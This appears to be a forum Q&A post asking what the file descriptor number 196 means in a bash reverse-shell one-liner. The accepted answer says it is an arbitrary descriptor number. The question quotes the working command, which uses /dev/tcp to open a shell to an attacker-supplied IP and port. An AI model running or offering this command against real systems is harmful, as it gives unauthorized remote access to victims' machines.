# Reverse Bash Shell one liner

Tags: shellcode, bash

I know that when the following code is run a reverse bash shell is created from the victim's computer to the attacker's computer. Can someone please explain to me the significance of the number "196"?

```
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
```

This code was taken from [here](https://null-byte.wonderhowto.com/how-to/create-reverse-shell-remotely-execute-root-commands-over-any-open-port-using-netcat-bash-0132658/).

Answer (score 4, accepted):

> Can someone please explain to me the significance of the number "196"?

`196` is a randomly chosen number for a file descriptor that you're opening for reading from and writing to via [`exec`](https://askubuntu.com/questions/525767/what-does-an-exec-command-do). You can replace it by any number > 2.

Comment: Okay, I thought I understood this but I don't think I do. Can you please explain the entire statement further?

Comment: It's all here: https://en.wikipedia.org/wiki/File_descriptor In this case it's an ID that you use to send stuff of the network.

Comment: Here is a good explanation on file descriptors https://stackoverflow.com/a/5256705/3628290